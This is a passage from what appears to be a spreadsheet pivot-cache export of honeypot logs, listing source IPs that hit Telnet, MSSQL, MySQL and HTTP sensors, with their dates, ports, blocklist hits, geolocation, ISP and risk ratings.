    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;25&amp;&amp;9100&amp;&amp;58774&amp;&amp;NA&amp;&amp;18064&amp;&amp;20145"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:a430"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3616"/>
    <x v="3616"/>
    <s v="NA&amp;&amp;61-221-225-247.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T04:32:57"/>
    <d v="2024-12-15T00:38:56"/>
    <d v="2025-04-02T04:32:57"/>
    <n v="384"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;45871&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits']}"/>
    <n v="34"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-05-15"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3ddd:e1f7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3617"/>
    <x v="3617"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:30:14"/>
    <d v="2025-04-02T04:09:16"/>
    <d v="2025-04-02T04:30:14"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:d8b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3618"/>
    <x v="3618"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:27:29"/>
    <d v="2025-04-01T11:40:21"/>
    <d v="2025-04-02T04:27:29"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:7b95"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3619"/>
    <x v="3619"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:19:29"/>
    <d v="2025-04-02T04:17:37"/>
    <d v="2025-04-02T04:19:29"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Varanasi"/>
    <s v="Varanasi (Kashi Vidyapith)"/>
    <s v="1253405"/>
    <s v="221002"/>
    <s v="25.3212"/>
    <s v="82.9896"/>
    <s v="55824"/>
    <s v="National Knowledge Network"/>
    <s v="National Knowledge Network"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-09-14"/>
    <s v="NKN-MGKV-UP"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e8b:ed66"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3620"/>
    <x v="3620"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:08:23"/>
    <d v="2025-04-02T04:08:23"/>
    <d v="2025-04-02T04:08:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:fd2d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3621"/>
    <x v="3621"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:07:28"/>
    <d v="2025-01-01T02:34:58"/>
    <d v="2025-04-02T04:07:28"/>
    <n v="44"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AM"/>
    <s v="Armenia"/>
    <s v="AV"/>
    <s v="Armavir"/>
    <s v="Metsamor Municipality"/>
    <s v="Aygeshat"/>
    <s v="616851"/>
    <s v="NA"/>
    <s v="40.0751"/>
    <s v="44.0611"/>
    <s v="210315"/>
    <s v="Arpinet LLC"/>
    <s v="Arpinet LLC"/>
    <s v="business"/>
    <s v="RealTime ISP"/>
    <s v="2018-04-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5be7:cab5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3622"/>
    <x v="3622"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T04:05:52"/>
    <d v="2025-04-02T04:05:52"/>
    <d v="2025-04-02T04:05:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13696"/>
    <s v="101.694"/>
    <s v="4788"/>
    <s v="TTSSB-MY"/>
    <s v="Tm Technology Services Sdn Bhd"/>
    <s v="consumer"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c31:db4d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3623"/>
    <x v="3623"/>
    <s v="NA&amp;&amp;node-1el.pool-125-27.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-02T04:03:26"/>
    <d v="2025-04-02T03:37:27"/>
    <d v="2025-04-02T04:03:26"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8941"/>
    <s v="100.584"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="2006-10-26"/>
    <s v="totnet"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7d1b:71d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3624"/>
    <x v="3624"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T03:30:08"/>
    <d v="2025-04-02T03:30:08"/>
    <d v="2025-04-02T03:30:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="42"/>
    <s v="Konya"/>
    <s v="NA"/>
    <s v="Konya"/>
    <s v="306571"/>
    <s v="NA"/>
    <s v="37.8746"/>
    <s v="32.4932"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bc38:2a62"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3625"/>
    <x v="3625"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:46:29"/>
    <d v="2025-04-02T02:44:33"/>
    <d v="2025-04-02T02:46:29"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="45"/>
    <s v="Đồng Tháp Province"/>
    <s v="Châu Thành District"/>
    <s v="Cái Tàu Hạ"/>
    <s v="1586502"/>
    <s v="NA"/>
    <s v="10.2597"/>
    <s v="105.87"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eb7:c03"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3626"/>
    <x v="3626"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:39:08"/>
    <d v="2025-04-02T02:39:08"/>
    <d v="2025-04-02T02:39:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:aea3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3627"/>
    <x v="3627"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:39:06"/>
    <d v="2023-08-30T15:11:24"/>
    <d v="2025-04-02T02:39:06"/>
    <n v="31165"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55818&amp;&amp;55837&amp;&amp;55839&amp;&amp;161&amp;&amp;57561&amp;&amp;36088&amp;&amp;36113"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="104"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79a0:b16a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3628"/>
    <x v="3628"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:35:16"/>
    <d v="2025-03-06T21:20:06"/>
    <d v="2025-04-02T02:35:16"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Rewari"/>
    <s v="Bāwal"/>
    <s v="1276666"/>
    <s v="NA"/>
    <s v="28.1094"/>
    <s v="76.6025"/>
    <s v="150562"/>
    <s v="NRH TELECOM PRIVATE LIMITED"/>
    <s v="NRH TELECOM PRIVATE LIMITED"/>
    <s v="business"/>
    <s v="NRH Telecom Private Limited"/>
    <s v="2022-08-03"/>
    <s v="NITIN121"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6755:8553"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3629"/>
    <x v="3629"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T02:29:23"/>
    <d v="2024-09-10T01:35:00"/>
    <d v="2025-04-02T02:29:23"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;161"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="EC"/>
    <s v="Ecuador"/>
    <s v="A"/>
    <s v="Azuay"/>
    <s v="Cuenca"/>
    <s v="Cuenca"/>
    <s v="10793423"/>
    <s v="010103"/>
    <s v="-2.88758"/>
    <s v="-78.9791"/>
    <s v="14522"/>
    <s v="Satnet"/>
    <s v="Satnet"/>
    <s v="business"/>
    <s v="Satnet Cuenca Cor-carlos Rodrigo Narvaez Chavez"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
